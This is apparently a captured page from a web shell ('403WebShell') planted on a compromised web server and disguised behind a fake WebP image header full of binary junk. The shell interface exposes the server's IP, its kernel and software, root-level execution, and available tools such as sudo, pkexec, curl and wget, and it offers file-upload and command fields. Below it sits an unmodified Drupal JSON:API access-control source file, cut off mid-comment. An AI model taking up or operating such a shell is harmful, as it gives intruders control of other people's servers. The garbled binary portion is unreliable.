RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð ....................................../////.===Shadow-Here===./////................................................ > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < ------------------------------------------------------------------------------------------------------------------- /////////////////////////////////////////////////////////////////////////////////////////////////////////////////// RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿ /ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g gÆv›Øuh~ a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô ^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>ÄÍ ¥ˆuߤ#ˆ$6ù™¥îŠ‡y’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ ¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×U ñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒwŽ¼GÔ´zàÒò ð*ëzƒ•4~H]Ø‹f ñÓÈñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J ù…î èo£ßPÎñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~ ©¹rÓê‚j¶d¸{^Q'˜±Crß ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€IßÚù+–MGi‰*jE€‘JcÜ ÓÌ EÏÚj]o˜ Þr <¾U ûŪæÍ/šÝH¥˜b”¼ ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI %1À% ¹Ò – ”ϝS¦‰4&¶£°à Öý”û_Ò Áw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ß Õû˜þãÇ-PÍ.¾XV‘€ dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:F±Ú” .Ѽ+Áu&Ç`."pÈÉw o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ '²Ð öø_¨ÂÉ9u鶳ÒŠõTàîMØ#û¯gN‡bÙ놚X„ö …ÉeüÌ^J ‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB «Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•â•ªVêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•î¦ñ·­(VlŸ‘ nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z H“C}”¬,Mp ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð !BÔ Ç¢Ä©š+Õì D«7ìN¶ŽðÔ " ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹êN[Ò3Œñbï8P 4ƒ×q¢bo|?<ÛX¬òÄÍ°L–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô ¾–ÄÏø ×e8Ë©$ÄF¹Å‹ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™Mÿþ(±“t@â“ö2­´TG5yé]çå僳 .·ÍïçÝ7UÚ±Ð/Nè»,_Ï ùdj7\ï Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢ š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï 3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ 0fãaN]òY³RV ™î$®K2R¨`W!1Ôó\;Ý ýB%qæK•&ÓÈe9È0êI±žeŸß -ú@žQr¦ ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí ;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né `ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€ 05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6] µÆ„Ooòü ²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6 ¢}`ùH­–”¡k ‰P1>š†®9z11!X wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýc塶7ßŠß 57^\wÒÐÆ k§h,Œý î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} ³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtà 0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2 †üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼ ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“ wiÎ×7_… ¸ \#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀ qªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒ qÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ (øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼ „±ÍçèSaÓ 3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œïJ·±$§?º>ÖüœcNÌù¯G ‹ñ2ŠBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ ‰ p5?0ÊƃZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳ è¼ÐFׄ^¡Öì fE“F4A…!ì/…¦Lƒ… … $%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š Â* ­íÄ9­< h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:! Aõ.ç~ÓBûH÷JCÌ]õVƒd «ú´QÙEA–¯¯Œ!.ˆˆëQ±ù œ·Ì!Õâ )ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù+p{™ðè û³”g±OƒÚSù£áÁÊ„ä,ï7š²G ÕÌBk)~ÑiCµ|h#u¤¶îK¨² #²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜ ŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4 zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñëäg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\ ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû …‚g¶Úüâî*moGè¨7%u!]PhÏd™Ý%Îx: VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5 Œ%u5XkñÌ*NU%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´ ÒÊ]y žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü .̘¯€šòü¤U~Ù†*¢!?ò wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯  B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1 ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_ µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo §—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~  ‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ ®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF ±Ê8 7Hցϓ²Æ–m9…òŸï]Â1äN†VLâCˆU .ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘ |¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð E6-‡¼!ýpãÔM˜ Âsìe¯ñµK¢Ç¡ùôléœ4Ö£”À Š®Ðc ^¨À}ÙËŸ§›ºê{ÊuÉC ×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò· àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£Xé¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@NŠ À(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 403WebShell
403Webshell
Server IP : 104.225.223.251  /  Your IP : 216.73.216.41
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux agtdemo03 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /srv/wp/ciieduconnect.in/www/core/modules/jsonapi/src/Access/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /srv/wp/ciieduconnect.in/www/core/modules/jsonapi/src/Access/TemporaryQueryGuard.php
<?php

namespace Drupal\jsonapi\Access;

use Drupal\Core\Access\AccessResult;
use Drupal\Core\Cache\CacheableMetadata;
use Drupal\Core\Config\Entity\ConfigEntityTypeInterface;
use Drupal\Core\Entity\EntityFieldManagerInterface;
use Drupal\Core\Entity\EntityTypeInterface;
use Drupal\Core\Entity\Query\QueryInterface;
use Drupal\Core\Extension\ModuleHandlerInterface;
use Drupal\Core\Field\FieldStorageDefinitionInterface;
use Drupal\Core\Session\AccountInterface;
use Drupal\Core\TypedData\DataReferenceDefinitionInterface;
use Drupal\jsonapi\Query\EntityCondition;
use Drupal\jsonapi\Query\EntityConditionGroup;
use Drupal\jsonapi\Query\Filter;

/**
 * Adds sufficient access control to collection queries.
 *
 * This class will be removed when new Drupal core APIs have been put in place
 * to make it obsolete.
 *
 * @internal JSON:API maintains no PHP API. The API is the HTTP API. This class
 *   may change at any time and could break any dependencies on it.
 *
 * @todo These additional security measures should eventually reside in the
 *   Entity API subsystem but were introduced here to address a security
 *   vulnerability. The following two issues should obsolesce this class:
 *
 * @see https://www.drupal.org/project/drupal/issues/2809177
 * @see https://www.drupal.org/project/drupal/issues/777578
 *
 * @see https://www.drupal.org/project/drupal/issues/3032787
 * @see jsonapi.api.php
 */
class TemporaryQueryGuard {

  /**
   * The entity field manager.
   *
   * @var \Drupal\Core\Entity\EntityFieldManagerInterface
   */
  protected static $fieldManager;

  /**
   * The module handler.
   *
   * @var \Drupal\Core\Extension\ModuleHandlerInterface
   */
  protected static $moduleHandler;

  /**
   * Sets the entity field manager.
   *
   * This must be called before calling ::applyAccessControls().
   *
   * @param \Drupal\Core\Entity\EntityFieldManagerInterface $field_manager
   *   The entity field manager.
   */
  public static function setFieldManager(EntityFieldManagerInterface $field_manager) {
    static::$fieldManager = $field_manager;
  }

  /**
   * Sets the module handler.
   *
   * This must be called before calling ::applyAccessControls().
   *
   * @param \Drupal\Core\Extension\ModuleHandlerInterface $module_handler
   *   The module handler.
   */
  public static function setModuleHandler(ModuleHandlerInterface $module_handler) {
    static::$moduleHandler = $module_handler;
  }

  /**
   * Applies access controls to an entity query.
   *
   * @param \Drupal\jsonapi\Query\Filter $filter
   *   The filters applicable to the query.
   * @param \Drupal\Core\Entity\Query\QueryInterface $query
   *   The query to which access controls should be applied.
   * @param \Drupal\Core\Cache\CacheableMetadata $cacheability
   *   Collects cacheability for the query.
   */
  public static function applyAccessControls(Filter $filter, QueryInterface $query, CacheableMetadata $cacheability) {
    assert(static::$fieldManager !== NULL);
    assert(static::$moduleHandler !== NULL);
    $filtered_fields = static::collectFilteredFields($filter->root());
    $field_specifiers = array_map(function ($field) {
      return explode('.', $field);
    }, $filtered_fields);
    static::secureQuery($query, $query->getEntityTypeId(), static::buildTree($field_specifiers), $cacheability);
  }

  /**
   * Applies tags, metadata and conditions to secure an entity query.
   *
   * @param \Drupal\Core\Entity\Query\QueryInterface $query
   *   The query to be secured.
   * @param string $entity_type_id
   *   An entity type ID.
   * @param array $tree
   *   A tree of field specifiers in an entity query condition. The tree is a
   *   multi-dimensional array where the keys are field specifiers and the
   *   values are multi-dimensional array of the same form, containing only
   *   subsequent specifiers. @see ::buildTree().
   * @param \Drupal\Core\Cache\CacheableMetadata $cacheability
   *   Collects cacheability for the query.
   * @param string|null $field_prefix
   *   Internal use only. Contains a string representation of the previously
   *   visited field specifiers.
   * @param \Drupal\Core\Field\FieldStorageDefinitionInterface $field_storage_definition
   *   Internal use only. The current field storage definition, if known.
   *
   * @see \Drupal\Core\Database\Query\AlterableInterface::addTag()
   * @see \Drupal\Core\Database\Query\AlterableInterface::addMetaData()
   * @see \Drupal\Core\Database\Query\ConditionInterface
   */
  protected static function secureQuery(QueryInterface $query, $entity_type_id, array $tree, CacheableMetadata $cacheability, $field_prefix = NULL, FieldStorageDefinitionInterface $field_storage_definition = NULL) {
    $entity_type = \Drupal::entityTypeManager()->getDefinition($entity_type_id);
    // Config entity types are not fieldable, therefore they do not have field
    // access restrictions, nor entity references to other entity types.
    if ($entity_type instanceof ConfigEntityTypeInterface) {
      return;
    }
    foreach ($tree as $specifier => $children) {
      // The field path reconstructs the entity condition fields.
      // E.g. `uid.0` would become `uid.0.name` if $specifier === 'name'.
      $child_prefix = (is_null($field_prefix)) ? $specifier : "$field_prefix.$specifier";
      if (is_null($field_storage_definition)) {
        // When the field storage definition is NULL, this specifier is the
        // first specifier in an entity query field path or the previous
        // specifier was a data reference that has been traversed. In both
        // cases, the specifier must be a field name.
        $field_storage_definitions = static::$fieldManager->getFieldStorageDefinitions($entity_type_id);
        static::secureQuery($query, $entity_type_id, $children, $cacheability, $child_prefix, $field_storage_definitions[$specifier]);
        // When $field_prefix is NULL, this must be the first specifier in the
        // entity query field path and a condition for the query's base entity
        // type must be applied.
        if (is_null($field_prefix)) {
          static::applyAccessConditions($query, $entity_type_id, NULL, $cacheability);
        }
      }
      else {
        // When the specifier is an entity reference, it can contain an entity
        // type specifier, like so: `entity:node`. This extracts the `entity`
        // portion. JSON:API will have already validated that the property
        // exists.
        $split_specifier = explode(':', $specifier, 2);
        [$property_name, $target_entity_type_id] = array_merge($split_specifier, count($split_specifier) === 2 ? [] : [NULL]);
        // The specifier is either a field property or a delta. If it is a data
        // reference or a delta, then it needs to be traversed to the next
        // specifier. However, if the specific is a simple field property, i.e.
        // it is neither a data reference nor a delta, then there is no need to
        // evaluate the remaining specifiers.
        $property_definition = $field_storage_definition->getPropertyDefinition($property_name);
        if ($property_definition instanceof DataReferenceDefinitionInterface) {
          // Because the filter is following an entity reference, ensure
          // access is respected on those targeted entities.
          // Examples:
          // - node_query_node_access_alter()
          $target_entity_type_id = $target_entity_type_id ?: $field_storage_definition->getSetting('target_type');
          $query->addTag("{$target_entity_type_id}_access");
          static::applyAccessConditions($query, $target_entity_type_id, $child_prefix, $cacheability);
          // Keep descending the tree.
          static::secureQuery($query, $target_entity_type_id, $children, $cacheability, $child_prefix);
        }
        elseif (is_null($property_definition)) {
          assert(is_numeric($property_name), 'The specifier is not a property name, it must be a delta.');
          // Keep descending the tree.
          static::secureQuery($query, $entity_type_id, $children, $cacheability, $child_prefix, $field_storage_definition);
        }
      }
    }
  }

  /**
   * Applies access conditions to ensure 'view' access is respected.
   *
   * Since the given entity type might not be the base entity type of the query,
   * the field prefix should be applied to ensure that the conditions are
   * applied to the right subset of entities in the query.
   *
   * @param \Drupal\Core\Entity\Query\QueryInterface $query
   *   The query to which access conditions should be applied.
   * @param string $entity_type_id
   *   The entity type for which to access conditions should be applied.
   * @param string|null $field_prefix
   *   A prefix to add before any query condition fields. NULL if no prefix
   *   should be added.
   * @param \Drupal\Core\Cache\CacheableMetadata $cacheability
   *   Collects cacheability for the query.
   */
  protected static function applyAccessConditions(QueryInterface $query, $entity_type_id, $field_prefix, CacheableMetadata $cacheability) {
    $access_condition = static::getAccessCondition($entity_type_id, $cacheability);
    if ($access_condition) {
      $prefixed_condition = !is_null($field_prefix)
        ? static::addConditionFieldPrefix($access_condition, $field_prefix)
        : $access_condition;
      $filter = new Filter($prefixed_condition);
      $query->condition($filter->queryCondition($query));
    }
  }

  /**
   * Prefixes all fields in an EntityConditionGroup.
   */
  protected static function addConditionFieldPrefix(EntityConditionGroup $group, $field_prefix) {
    $prefixed = [];
    foreach ($group->members() as $member) {
      if ($member instanceof EntityConditionGroup) {
        $prefixed[] = static::addConditionFieldPrefix($member, $field_prefix);
      }
      else {
        $field = !empty($field_prefix) ? "{$field_prefix}." . $member->field() : $member->field();
        $prefixed[] = new EntityCondition($field, $member->value(), $member->operator());
      }
    }
    return new EntityConditionGroup($group->conjunction(), $prefixed);
  }

  /**
   * Gets an EntityConditionGroup that filters out inaccessible entities.
   *
   * @param string $entity_type_id
   *   The entity type ID for which to get an EntityConditionGroup.
   * @param \Drupal\Core\Cache\CacheableMetadata $cacheability
   *   Collects cacheability for the query.
   *
   * @return \Drupal\jsonapi\Query\EntityConditionGroup|null
   *   An EntityConditionGroup or NULL if no conditions need to be applied to
   *   secure an entity query.
   */
  protected static function getAccessCondition($entity_type_id, CacheableMetadata $cacheability) {
    $current_user = \Drupal::currentUser();
    $entity_type = \Drupal::entityTypeManager()->getDefinition($entity_type_id);

    // Get the condition that handles generic restrictions, such as published
    // and owner.
    $generic_condition = static::getAccessConditionForKnownSubsets($entity_type, $current_user, $cacheability);

    // Some entity types require additional conditions. We don't know what
    // contrib entity types require, so they are responsible for implementing
    // hook_query_ENTITY_TYPE_access_alter(). Some core entity types have
    // logic in their access control handler that isn't mirrored in
    // hook_query_ENTITY_TYPE_access_alter(), so we duplicate that here until
    // that's resolved.
    $specific_condition = NULL;
    switch ($entity_type_id) {
      case 'block_content':
        // Allow access only to reusable blocks.
        // @see \Drupal\block_content\BlockContentAccessControlHandler::checkAccess()
        if (isset(static::$fieldManager->getBaseFieldDefinitions($entity_type_id)['reusable'])) {
          $specific_condition = new EntityCondition('reusable', 1);
          $cacheability->addCacheTags($entity_type->getListCacheTags());
        }
        break;

      case 'comment':
        // @see \Drupal\comment\CommentAccessControlHandler::checkAccess()
        $specific_condition = static::getCommentAccessCondition($entity_type, $current_user, $cacheability);
        break;

      case 'entity_test':
        // This case is only necessary for testing comment access controls.
        // @see \Drupal\jsonapi\Tests\Functional\CommentTest::testCollectionFilterAccess()
        $blacklist = \Drupal::state()->get('jsonapi__entity_test_filter_access_blacklist', []);
        $cacheability->addCacheTags(['state:jsonapi__entity_test_filter_access_blacklist']);
        $specific_conditions = [];
        foreach ($blacklist as $id) {
          $specific_conditions[] = new EntityCondition('id', $id, '<>');
        }
        if ($specific_conditions) {
          $specific_condition = new EntityConditionGroup('AND', $specific_conditions);
        }
        break;

      case 'file':
        // Allow access only to public files and files uploaded by the current
        // user.
        // @see \Drupal\file\FileAccessControlHandler::checkAccess()
        $specific_condition = new EntityConditionGroup('OR', [
          new EntityCondition('uri', 'public://', 'STARTS_WITH'),
          new EntityCondition('uid', $current_user->id()),
        ]);
        $cacheability->addCacheTags($entity_type->getListCacheTags());
        break;

      case 'shortcut':
        // Unless the user can administer shortcuts, allow access only to the
        // user's currently displayed shortcut set.
        // @see \Drupal\shortcut\ShortcutAccessControlHandler::checkAccess()
        if (!$current_user->hasPermission('administer shortcuts')) {
          $specific_condition = new EntityCondition('shortcut_set', shortcut_current_displayed_set()->id());
          $cacheability->addCacheContexts(['user']);
          $cacheability->addCacheTags($entity_type->getListCacheTags());
        }
        break;

      case 'user':
        // Disallow querying values of the anonymous user.
        // @see \Drupal\user\UserAccessControlHandler::checkAccess()
        $specific_condition = new EntityCondition('uid', '0', '!=');
        break;
    }

    // Return a combined condition.
    if ($generic_condition && $specific_condition) {
      return new EntityConditionGroup('AND', [$generic_condition, $specific_condition]);
    }
    elseif ($generic_condition) {
      return $generic_condition instanceof EntityConditionGroup ? $generic_condition : new EntityConditionGroup('AND', [$generic_condition]);
    }
    elseif ($specific_condition) {
      return $specific_condition instanceof EntityConditionGroup ? $specific_condition : new EntityConditionGroup('AND', [$specific_condition]);
    }

    return NULL;
  }

  /**
   * Gets an access condition for the allowed JSONAPI_FILTER_AMONG_* subsets.
   *
   * If access is allowed for the JSONAPI_FILTER_AMONG_ALL subset, then no
   * conditions are returned. Otherwise, if access is allowed for
   * JSONAPI_FILTER_AMONG_PUBLISHED, JSONAPI_FILTER_AMONG_ENABLED, or
   * JSONAPI_FILTER_AMONG_OWN, then a condition group is returned for the union
   * of allowed subsets. If no subsets are allowed, then static::alwaysFalse()
   * is returned.
   *
   * @param \Drupal\Core\Entity\EntityTypeInterface $entity_type
   *   The entity type for which to check filter access.
   * @param \Drupal\Core\Session\AccountInterface $account
   *   The account for which to check access.
   * @param \Drupal\Core\Cache\CacheableMetadata $cacheability
   *   Collects cacheability for the query.
   *
   * @return \Drupal\jsonapi\Query\EntityConditionGroup|null
   *   An EntityConditionGroup or NULL if no conditions need to be applied to
   *   secure an entity query.
   */
  protected static function getAccessConditionForKnownSubsets(EntityTypeInterface $entity_type, AccountInterface $account, CacheableMetadata $cacheability) {
    // Get the combined access results for each JSONAPI_FILTER_AMONG_* subset.
    $access_results = static::getAccessResultsFromEntityFilterHook($entity_type, $account);

    // No conditions are needed if access is allowed for all entities.
    $cacheability->addCacheableDependency($access_results[JSONAPI_FILTER_AMONG_ALL]);
    if ($access_results[JSONAPI_FILTER_AMONG_ALL]->isAllowed()) {
      return NULL;
    }

    // If filtering is not allowed across all entities, but is allowed for
    // certain subsets, then add conditions that reflect those subsets. These
    // will be grouped in an OR to reflect that access may be granted to
    // more than one subset. If no conditions are added below, then
    // static::alwaysFalse() is returned.
    $conditions = [];

    // The "published" subset.
    $published_field_name = $entity_type->getKey('published');
    if ($published_field_name) {
      $access_result = $access_results[JSONAPI_FILTER_AMONG_PUBLISHED];
      $cacheability->addCacheableDependency($access_result);
      if ($access_result->isAllowed()) {
        $conditions[] = new EntityCondition($published_field_name, 1);
        $cacheability->addCacheTags($entity_type->getListCacheTags());
      }
    }

    // The "enabled" subset.
    // @todo Remove ternary when the 'status' key is added to the User entity type.
    $status_field_name = $entity_type->id() === 'user' ? 'status' : $entity_type->getKey('status');
    if ($status_field_name) {
      $access_result = $access_results[JSONAPI_FILTER_AMONG_ENABLED];
      $cacheability->addCacheableDependency($access_result);
      if ($access_result->isAllowed()) {
        $conditions[] = new EntityCondition($status_field_name, 1);
        $cacheability->addCacheTags($entity_type->getListCacheTags());
      }
    }

    // The "owner" subset.
    // @todo Remove ternary when the 'uid' key is added to the User entity type.
    $owner_field_name = $entity_type->id() === 'user' ? 'uid' : $entity_type->getKey('owner');
    if ($owner_field_name) {
      $access_result = $access_results[JSONAPI_FILTER_AMONG_OWN];
      $cacheability->addCacheableDependency($access_result);
      if ($access_result->isAllowed()) {
        $cacheability->addCacheContexts(['user']);
        if ($account->isAuthenticated()) {
          $conditions[] = new EntityCondition($owner_field_name, $account->id());
          $cacheability->addCacheTags($entity_type->getListCacheTags());
        }
      }
    }

    // If no conditions were added above, then access wasn't granted to any
